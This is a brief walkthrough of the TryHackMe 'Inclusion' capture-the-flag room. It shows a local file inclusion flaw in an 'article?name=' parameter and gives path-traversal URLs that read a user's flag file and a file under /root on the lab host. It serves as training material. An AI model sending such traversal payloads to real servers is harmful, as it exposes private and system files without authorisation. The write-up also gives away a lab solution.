Inclusion
A beginner level LFI challenge
TryHackMe - Inclusion Created by falconfeast
Scanning (IP : 10.10.242.102)
NMAP
LFI parameter
On URL http://10.10.242.102/article?name=<FUZZ>
You can view any existing file on the server.
© falconfeast 2020
gives the hint of user name as falconfeast.
user.txt
: http://10.10.242.102/article?name=../../../../../home/falconfeast/user.txt
root.txt : http://10.10.242.102/article?name=../../../../../root/root.txt
Last updated